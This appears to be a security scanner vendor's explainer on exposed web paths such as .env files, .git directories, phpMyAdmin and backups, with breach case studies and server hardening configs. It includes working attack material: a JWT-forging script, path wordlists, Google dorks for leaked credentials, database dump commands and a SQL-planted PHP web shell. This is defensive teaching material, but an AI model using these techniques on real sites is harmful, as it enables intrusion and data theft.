Exposed Sensitive Paths: The Low-Hanging Fruit of Web Security

What is it?

Exposed sensitive paths are files and directories accessible via web browsers that should be restricted from public access. These include configuration files, development artifacts, version control directories, database administration interfaces, and backup files that can reveal critical system information or provide direct access to sensitive resources.

Common examples include:

  • .env files containing database credentials and API keys
  • .git/ directories exposing source code and history
  • wp-admin/ login pages without rate limiting or IP restrictions
  • phpMyAdmin/ database management interfaces
  • .sql backup files with full database dumps
  • config.php or settings.py with plaintext secrets
  • .DS_Store files revealing directory structure
  • composer.json, package.json with dependency information
  • Debug logs containing sensitive data
  • Backup files like config.php.bak or database.sql.gz

These paths exist because developers need them during development but forget to restrict or remove them before deployment. A single exposed .env file can grant attackers complete access to your database, external APIs, and authentication systems—essentially handing over the keys to your entire infrastructure.

Why does it matter?

Exposed sensitive paths represent one of the most easily exploitable security vulnerabilities, requiring minimal technical skill while providing maximum impact. Unlike complex exploits that require vulnerability chaining or sophisticated techniques, accessing an exposed .env file is as simple as:

https://your-site.com/.env

Complete System Compromise

A typical .env file contains everything an attacker needs:

DB_HOST=production-db.example.com
DB_DATABASE=app_production
DB_USERNAME=admin
DB_PASSWORD=SuperSecret123!

AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

STRIPE_SECRET_KEY=sk_live_51Abc123...
SMTP_PASSWORD=email_password_here

APP_KEY=base64:random_encryption_key_here
JWT_SECRET=json_web_token_secret

With this information, attackers can:

  • Access your entire database and extract all user data
  • Charge arbitrary amounts to your AWS account
  • Process fraudulent transactions through your payment gateway
  • Send spam through your email service
  • Decrypt encrypted user data
  • Impersonate any user with JWT tokens
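The last item is worth spelling out: with an exposed JWT_SECRET, forging a token for any user takes a few lines of shell. This is a sketch assuming HS256-signed tokens; the secret value and the claims are placeholders:

```shell
#!/usr/bin/env bash
# Forge an HS256 JWT using a leaked JWT_SECRET (placeholder value)
SECRET="json_web_token_secret"

# base64url: standard base64 with '+/' swapped for '-_', padding stripped
b64url() { openssl base64 -A | tr '+/' '-_' | tr -d '='; }

HEADER=$(printf '{"alg":"HS256","typ":"JWT"}' | b64url)
PAYLOAD=$(printf '{"sub":"1","role":"admin"}' | b64url)  # arbitrary claims
SIG=$(printf '%s.%s' "$HEADER" "$PAYLOAD" \
      | openssl dgst -sha256 -hmac "$SECRET" -binary | b64url)

# Prints a token the server will accept as genuinely signed
echo "$HEADER.$PAYLOAD.$SIG"
```

Any server that validates tokens with only that secret will accept this token, which is why a leaked JWT_SECRET means rotating it and invalidating every outstanding session.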

Source Code Disclosure

Exposed .git/ directories allow attackers to download your entire codebase:

# Automated tools like git-dumper
git-dumper https://target-site.com/.git/ output-directory

# Now attacker has:
# - All source code
# - Commit history with developer comments
# - Deleted files containing secrets
# - Internal documentation
# - Additional vulnerabilities to exploit

Source code exposure reveals:

  • Business logic and proprietary algorithms
  • Additional API endpoints not linked publicly
  • Commented-out code with hardcoded credentials
  • SQL queries vulnerable to injection
  • Authentication mechanisms to bypass

Database Access via phpMyAdmin

An exposed phpMyAdmin/ installation without IP restrictions allows anyone to access your database management interface. If default credentials haven't been changed (or can be brute-forced), attackers gain:

  • Full database read/write access
  • Ability to execute arbitrary SQL queries
  • User data extraction
  • Database modification or deletion
  • Potential for SQL injection into stored procedures

Information Disclosure for Targeted Attacks

Even "minor" exposures like composer.json or package.json provide attackers with:

  • Exact versions of all dependencies
  • Known vulnerabilities in those specific versions
  • Framework and language version information
  • Development tools and testing frameworks used

This reconnaissance enables precise, targeted attacks rather than generic exploit attempts.
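A single request is enough to enumerate a target's exact dependency pins. This is a sketch; the domain is a placeholder and jq is assumed to be installed:

```shell
# List "name version" pairs from an exposed package.json
curl -s https://target-site.com/package.json \
  | jq -r '.dependencies // {} | to_entries[] | "\(.key) \(.value)"'

# Each pair can then be matched against advisory databases
# (npm audit, OSV, CVE feeds) for known exploits
```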

How attacks work

Attackers use automated scanners to discover exposed paths across thousands of sites simultaneously, then manually exploit high-value targets.

Automated Discovery with Dirbusting

Attackers use directory enumeration tools with lists of common sensitive paths:

Using gobuster:

gobuster dir -u https://target-site.com \
    -w /usr/share/wordlists/common-paths.txt \
    -x php,bak,sql,env,git

# Output shows discovered paths:
/.env (Status: 200)
/.git/HEAD (Status: 200)
/backup/database.sql (Status: 200)
/phpMyAdmin/ (Status: 200)

Common wordlists contain:

.env
.env.local
.env.production
.git/HEAD
.git/config
.svn/entries
.DS_Store
config.php
config.php.bak
wp-config.php.bak
database.sql
database.sql.gz
phpMyAdmin/
adminer.php
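
The same wordlist idea works as a quick defensive self-check. This is a sketch; replace the TARGET placeholder with your own domain, and only scan infrastructure you own:

```shell
#!/usr/bin/env bash
# Probe your own site for the common sensitive paths listed above
TARGET="https://your-site.com"   # placeholder

for path in .env .env.local .git/HEAD .git/config config.php.bak \
            wp-config.php.bak database.sql phpMyAdmin/ adminer.php; do
    code=$(curl -s -o /dev/null -w '%{http_code}' "$TARGET/$path" || true)
    # 404 is the ideal answer; anything else deserves a look
    if [ "$code" != "404" ]; then
        echo "CHECK: $TARGET/$path -> HTTP $code"
    fi
done
```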

Exploiting .env Files

  1. Discovery: Scanner finds https://target-site.com/.env returns HTTP 200
  2. Download: Attacker retrieves the file
  3. Parse credentials: Extract database and API credentials
  4. Database access: Connect directly to database:
mysql -h production-db.example.com \
      -u admin \
      -p'SuperSecret123!' \
      app_production
  5. Data exfiltration: Dump entire database:
mysqldump -h production-db.example.com \
          -u admin \
          -p'SuperSecret123!' \
          app_production > stolen_data.sql
  6. Lateral movement: Use AWS keys to access S3 buckets, EC2 instances, or other cloud resources
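
Step 3 (parsing credentials) is trivial because .env files already use shell KEY=VALUE syntax, so a downloaded copy can be sourced directly. A sketch using the placeholder values from earlier:

```shell
#!/usr/bin/env bash
# Simulate step 3: turn a downloaded .env into usable credentials
cat > stolen.env <<'EOF'
DB_HOST=production-db.example.com
DB_USERNAME=admin
DB_PASSWORD=SuperSecret123!
EOF

# .env files can be sourced as-is (values with spaces would need quoting)
set -a              # export everything that gets assigned
. ./stolen.env
set +a

# Prints a ready-to-run mysql command using the stolen values
echo "mysql -h $DB_HOST -u $DB_USERNAME -p'$DB_PASSWORD'"
rm stolen.env
```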

Git Directory Exploitation

When .git/ is exposed, attackers reconstruct your repository:

Manual method:

# Download key files
curl https://target-site.com/.git/HEAD
curl https://target-site.com/.git/config
curl https://target-site.com/.git/index

# Reconstruct repository (only works if the server allows git's
# "dumb" HTTP protocol; the automated tools below are more reliable)
git init
git fetch https://target-site.com/.git

Automated tools:

# git-dumper (more reliable)
git-dumper https://target-site.com/.git/ recovered-repo/

# Now search for secrets in history
cd recovered-repo/
git log --all --full-history --source -- '*password*'
git log --all --full-history --source -- '*secret*'
git log --all --full-history --source -- '*.env*'

Searching commit history for secrets:

# Developers often commit secrets then delete in next commit
# But history preserves them
git log -p | grep -i "password\|secret\|key" -A 2 -B 2

Google Dorking for Exposed Files

Attackers use Google to find exposed files at scale:

Example dorks:

inurl:".env" "DB_PASSWORD"
inurl:".git/HEAD" "ref:"
inurl:"phpMyAdmin" "Welcome to phpMyAdmin"
filetype:sql "INSERT INTO users"
intitle:"Index of" "backup.sql"
inurl:"wp-config.php.bak"

These queries reveal thousands of exposed sites automatically indexed by Google.

Exploiting phpMyAdmin

  1. Discovery: Find /phpMyAdmin/ or /phpmyadmin/ (case variations)
  2. Brute force: Try default credentials:
    • Username: root, admin, pma
    • Password: (empty), root, admin, password
  3. Database access: Once logged in:
    • Export all databases
    • Modify user tables to add administrator accounts
    • Execute SQL to create backdoors
    • Drop tables to cause denial of service

SQL backdoor example:

-- Create PHP backdoor via SQL
SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';

Backup File Exploitation

Developers create backups before making changes, then forget to delete them:

Common patterns:

config.php.bak
config.php.old
config.php.2026-02-11
config.php~
.config.php.swp
settings.py.backup

Attack process:

# Try variations
curl https://target-site.com/config.php.bak
curl https://target-site.com/config.php~
curl https://target-site.com/includes/config.php.old

# These usually aren't executed as PHP, so the server returns their source in plaintext

Unlike the original config.php, which executes server-side and returns only its output, .bak files are served as static content, revealing all secrets in plaintext.

Real-world incidents

Uber Data Breach (2016)

Uber suffered a massive data breach affecting 57 million users and drivers. The attackers found AWS credentials that Uber engineers had committed to a GitHub repository.

Attack chain:

  1. Uber developers committed AWS access keys to a private GitHub repo
  2. Attackers gained access to that repository using compromised developer credentials
  3. Found the AWS access keys in the committed code
  4. Used AWS keys to access S3 buckets containing backups
  5. Extracted 57 million user records, including names, emails, and phone numbers
  6. 600,000 driver's license numbers also stolen

Cost:

  • $148 million in settlements
  • CSO fired and later criminally convicted for covering up the breach
  • Massive reputational damage

Prevention: Never commit credentials to version control. Use .gitignore to exclude .env files.
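A pre-commit hook adds a cheap second line of defense. This grep-based sketch blocks only the most obvious mistakes (dedicated scanners like gitleaks or git-secrets are more thorough); place it at .git/hooks/pre-commit and make it executable:

```shell
#!/bin/sh
# Minimal pre-commit guard against committing secrets

staged=$(git diff --cached --name-only 2>/dev/null || true)

# Block any staged .env file (.env, .env.local, config/.env.production, ...)
if echo "$staged" | grep -qE '(^|/)\.env(\..*)?$'; then
    echo "ERROR: refusing to commit a .env file" >&2
    exit 1
fi

# Block content that looks like an AWS key ID or a private key header
if git diff --cached 2>/dev/null \
   | grep -qE 'AKIA[0-9A-Z]{16}|BEGIN (RSA|EC|OPENSSH) PRIVATE KEY'; then
    echo "ERROR: staged changes appear to contain a credential" >&2
    exit 1
fi
```

Install with `chmod +x .git/hooks/pre-commit`; git then runs it before every commit.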

Capital One Data Breach (2019)

A former AWS employee exploited misconfigured security to access over 100 million Capital One customer records.

Attack vector:

  1. Discovered misconfigured AWS WAF allowing SSRF (Server-Side Request Forgery)
  2. Used SSRF to access metadata service
  3. Retrieved AWS credentials from metadata endpoint
  4. Used credentials to list and access S3 buckets
  5. Downloaded sensitive data including 140,000 Social Security numbers

While not strictly an "exposed path" in the traditional sense, this demonstrates how exposed credentials (via metadata service) lead to catastrophic breaches.

Cost:

  • $80 million fine from OCC
  • $100-150 million estimated remediation costs
  • Class-action lawsuit settlements
  • Severe reputational damage

WordPress Config Backup Mass Exposure (2018)

Security researchers discovered thousands of WordPress sites with exposed wp-config.php backup files through Google dorking.

Discovery method:

inurl:"wp-config.php.bak"
inurl:"wp-config.php~"
inurl:"wp-config.txt"

Impact:

  • Thousands of sites with exposed database credentials
  • Credentials used to access databases remotely
  • Sites injected with malware and spam
  • User data stolen from e-commerce sites

Root cause: Developers and hosting providers creating backups during updates, forgetting to delete them or restrict access.

Codecov Supply Chain Attack (2021)

Attackers modified Codecov's Bash Uploader script to steal environment variables from CI/CD pipelines.

Attack method:

  1. Compromised Codecov's Docker image build process
  2. Modified bash script to exfiltrate environment variables
  3. Script executed in thousands of CI/CD pipelines
  4. Captured .env variables containing secrets from customers

Victims: Hundreds of companies, including Twilio, HashiCorp, and Rapid7

Impact:

  • Customer credentials exposed
  • API keys and cloud access keys stolen
  • Source code potentially accessed
  • Massive supply chain compromise

Lesson: Even properly secured .env files can be exposed if your CI/CD pipeline is compromised.

Git Directory Exposure at Fortune 500 (2020)

A security researcher found an exposed .git/ directory on a Fortune 500 company's subdomain.

What was exposed:

  • Complete source code for internal employee portal
  • Database schema and SQL migration files
  • API keys for internal services
  • Corporate network architecture diagrams
  • Employee authentication bypass methods

Disclosure process:

  1. Researcher discovered via automated scanning
  2. Reported via responsible disclosure
  3. Company fixed within 24 hours
  4. No evidence of malicious exploitation

Key point: Even without active exploitation, exposed repositories create significant risk. Attackers may have found it first without reporting.

What Nyambush detects

Nyambush performs comprehensive scans for exposed sensitive paths across your entire web infrastructure:

  1. Common Configuration Files:

    • .env, .env.local, .env.production, .env.backup
    • config.php, settings.py, web.config
    • database.yml, secrets.yml
    • All variations with .bak, .old, .backup, ~ suffixes
  2. Version Control Directories:

    • .git/HEAD, .git/config, .git/index
    • .svn/, .hg/, .bzr/
    • Detection even when directory listing is disabled
  3. Database Interfaces:

    • phpMyAdmin/, /pma/, /phpmyadmin/ (case-insensitive)
    • adminer.php
    • Database backup files: .sql, .sql.gz, .dump
  4. Framework-Specific Paths:

    • WordPress: wp-config.php.bak, readme.html
    • Laravel: .env, storage/logs/
    • Django: settings.py, local_settings.py
    • Node.js: .env, config.json
  5. Development Artifacts:

    • composer.json, composer.lock
    • package.json, package-lock.json
    • .DS_Store, Thumbs.db
    • .htaccess~, .htpasswd
  6. Backup and Log Files:

    • backup/, backups/, old/
    • *.log, error_log, debug.log
    • *.sql.gz, dump.sql, backup.tar.gz
  7. Cloud Configuration:

    • .aws/credentials
    • .azure/, azure-pipelines.yml
    • gcloud/, .gcloudignore
  8. Risk Scoring:

    • Critical: .env, .git/, database credentials exposed
    • High: phpMyAdmin without authentication, SQL backups
    • Medium: composer.json, framework version disclosure
    • Low: .DS_Store, directory listing enabled

Nyambush attempts to access these paths and analyzes responses:

  • HTTP 200: File directly accessible (critical)
  • HTTP 403: File exists but access denied (good, but reveals presence)
  • HTTP 404: File not found (ideal)

For detected exposures, Nyambush provides:

  • Exact URL of exposed resource
  • Content preview (if safely retrievable)
  • Specific remediation steps
  • Urgency rating based on content sensitivity

How to fix it

Protecting sensitive paths requires multiple layers: preventing exposure at the web server level, proper deployment processes, and ongoing monitoring.

1. Use .gitignore Properly

Prevent sensitive files from ever entering version control:

Comprehensive .gitignore:

# Environment variables
.env
.env.*
!.env.example

# Framework-specific
/vendor/
/node_modules/
/storage/*.key

# Database
*.sql
*.sqlite
*.db

# Logs
*.log
logs/
storage/logs/

# OS
.DS_Store
Thumbs.db

# Editor
*.swp
*.swo
*~
.vscode/
.idea/

# Backups
*.bak
*.backup
*.old
*.tmp

Important: .gitignore only prevents new files from being tracked; files already committed remain in history. Remove already-committed secrets, then rotate them, since any secret that reached a shared repository must be treated as compromised:

# Remove from history (DANGEROUS - rewrites history)
# Note: git now recommends git-filter-repo over filter-branch
git filter-branch --force --index-filter \
  "git rm --cached --ignore-unmatch .env" \
  --prune-empty --tag-name-filter cat -- --all

# Or use BFG Repo-Cleaner (faster, safer)
bfg --delete-files .env
git reflog expire --expire=now --all
git gc --prune=now --aggressive

2. Restrict Access with Web Server Configuration

Apache (.htaccess in root directory):

# Apache 2.4 syntax; on 2.2, use "Order allow,deny" + "Deny from all"

# Deny access to .env files
<FilesMatch "^\.env">
    Require all denied
</FilesMatch>

# Deny access to the .git directory
# (<DirectoryMatch> is not valid in .htaccess; RedirectMatch works)
RedirectMatch 404 /\.git

# Deny access to backup files
<FilesMatch "\.(bak|backup|old|save|swp|swo)$">
    Require all denied
</FilesMatch>

# Deny access to composer/package files
<FilesMatch "^(composer\.(json|lock)|package(-lock)?\.json)$">
    Require all denied
</FilesMatch>

# Deny access to log files
<FilesMatch "\.log$">
    Require all denied
</FilesMatch>

# Disable directory listing
Options -Indexes

Nginx (in server block):

server {
    listen 80;
    server_name example.com;
    root /var/www/html;

    # Deny .env files
    location ~ /\.env {
        deny all;
        return 404;
    }

    # Deny .git directory
    location ~ /\.git {
        deny all;
        return 404;
    }

    # Deny backup files
    location ~ \.(bak|backup|old|save|swp|swo)$ {
        deny all;
        return 404;
    }

    # Deny composer/package files
    location ~ ^/(composer\.(json|lock)|package(-lock)?\.json)$ {
        deny all;
        return 404;
    }

    # Deny log files
    location ~ \.log$ {
        deny all;
        return 404;
    }

    # Disable directory listing
    autoindex off;
}

3. Remove Files from Web Root

The safest approach is keeping sensitive files outside the web-accessible directory:

Directory structure:

project/
├── app/              # Application code (not web-accessible)
├── config/           # Configuration (not web-accessible)
│   └── .env          # Environment variables here
├── storage/          # Logs, cache (not web-accessible)
└── public/           # Web root - ONLY this directory accessible
    ├── index.php
    ├── css/
    └── js/

Web server configuration points to public/ only:

Apache:

DocumentRoot /var/www/project/public

Nginx:

root /var/www/project/public;

4. Restrict phpMyAdmin Access

IP Whitelist in Apache:

<Directory /usr/share/phpmyadmin>
    # Apache 2.4 syntax; the CIDR is your office network,
    # the single address your home IP
    Require ip 203.0.113.0/24
    Require ip 198.51.100.50
</Directory>

IP Whitelist in Nginx:

location /phpMyAdmin {
    allow 203.0.113.0/24;
    allow 198.51.100.50;
    deny all;
}

Use non-standard path:

# Instead of the default /phpMyAdmin URL, change the web server
# alias to an unpredictable path (combine with IP or auth
# restrictions; obscurity alone is not protection):
Alias /pma-x7j3k9 /usr/share/phpmyadmin

Require HTTP Basic Auth:

<Directory /usr/share/phpmyadmin>
    AuthType Basic
    AuthName "Restricted Access"
    AuthUserFile /etc/apache2/.htpasswd
    Require valid-user
</Directory>

Create password file:

htpasswd -c /etc/apache2/.htpasswd admin

Better solution: Don't expose phpMyAdmin at all. Use SSH tunneling:

# SSH tunnel from local machine
ssh -L 8080:localhost:80 user@server

# Access phpMyAdmin at http://localhost:8080/phpMyAdmin

5. Delete Backup and Temporary Files

Find and remove backup files:

# Find backup files
find /var/www/html -type f \( \
    -name "*.bak" -o \
    -name "*.backup" -o \
    -name "*.old" -o \
    -name "*.save" -o \
    -name "*~" \
\)

# Delete them (BE CAREFUL - verify list first)
find /var/www/html -type f \( \
    -name "*.bak" -o \
    -name "*.backup" -o \
    -name "*.old" -o \
    -name "*.save" -o \
    -name "*~" \
\) -delete

Automated cleanup script:

#!/bin/bash
# cleanup-backups.sh

WEB_ROOT="/var/www/html"

# Extensions to remove
EXTENSIONS=("bak" "backup" "old" "save" "tmp" "swp" "swo")

for ext in "${EXTENSIONS[@]}"; do
    find "$WEB_ROOT" -type f -name "*.$ext" -mtime +7 -delete
done

echo "Backup file cleanup completed"

Run via cron:

0 2 * * * /usr/local/bin/cleanup-backups.sh

6. Proper Deployment Process

Use deployment tools that exclude sensitive files:

Deployer (PHP):

// deploy.php
set('shared_files', ['.env']);
set('copy_dirs', ['node_modules', 'vendor']);

Capistrano (Ruby):

# config/deploy.rb
set :linked_files, %w{.env config/database.yml}

Ansible:

- name: Deploy application
  synchronize:
    src: ./
    dest: /var/www/html/
    rsync_opts:
      - "--exclude=.git"
      - "--exclude=.env"
      - "--exclude=node_modules"

7. robots.txt Considerations

DO NOT use robots.txt to hide sensitive paths:

# BAD - This tells attackers exactly where secrets are!
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /.env

This is counterproductive because:

  • Attackers don't respect robots.txt
  • It advertises the existence of sensitive paths
  • It provides a roadmap for reconnaissance

robots.txt is for search engines, not security.

8. Security Headers

Add headers to prevent accidental exposure:

# Prevent browsers from MIME-sniffing
Header set X-Content-Type-Options "nosniff"

# Prevent clickjacking
Header set X-Frame-Options "DENY"
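The directives above are for Apache; the equivalent inside an Nginx server block is:

```nginx
# Prevent browsers from MIME-sniffing
add_header X-Content-Type-Options "nosniff" always;

# Prevent clickjacking
add_header X-Frame-Options "DENY" always;
```

The `always` parameter makes Nginx send the headers on error responses too, not just 2xx/3xx.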

9. Regular Security Audits

Automated scanning:

# Nikto web server scanner
nikto -h https://your-site.com

# dirb directory bruteforcer
dirb https://your-site.com

# wpscan for WordPress
wpscan --url https://your-site.com --enumerate

Manual verification:

# Test common paths
curl https://your-site.com/.env
curl https://your-site.com/.git/HEAD
curl https://your-site.com/phpMyAdmin/
curl https://your-site.com/config.php.bak

10. Cloud Storage Security

For files stored in S3, Azure Blob, or Google Cloud Storage:

AWS S3 - Restrict bucket access:

{
  "Version": "2012-10-17",
  "Statement": [{
    "Sid": "DenyPublicAccess",
    "Effect": "Deny",
    "Principal": "*",
    "Action": "s3:GetObject",
    "Resource": "arn:aws:s3:::your-bucket/*",
    "Condition": {
      "StringNotEquals": {
        "aws:SourceVpce": "vpce-1234567"
      }
    }
  }]
}

Enable S3 Block Public Access:

aws s3api put-public-access-block \
    --bucket your-bucket \
    --public-access-block-configuration \
    "BlockPublicAcls=true,IgnorePublicAcls=true,BlockPublicPolicy=true,RestrictPublicBuckets=true"

Summary

Exposed sensitive paths represent critical security vulnerabilities that are trivially easy for attackers to exploit yet can grant complete system access. A single exposed .env file, .git/ directory, or phpMyAdmin installation can lead to full database compromise, AWS account takeover, and theft of all user data.

Protection requires multiple defensive layers:

  • Proper .gitignore to prevent secrets from entering version control
  • Web server restrictions to block access to sensitive paths
  • Files outside web root for maximum security
  • Regular audits to detect and remove backup files
  • Secure deployment processes that exclude sensitive files

Never rely on robots.txt or "security through obscurity"—attackers use automated scanners that test thousands of common paths regardless of what you attempt to hide.

Nyambush automatically scans your infrastructure for exposed paths including configuration files, version control directories, database interfaces, and backup files. We identify exactly which sensitive resources are publicly accessible and provide specific remediation steps to secure them before attackers discover them.

This is low-hanging fruit that attackers harvest first. Secure these paths today before your credentials, source code, or database become tomorrow's breach headline.


Is your domain secure?

Run a free scan with Nyambush to check your security risks right now.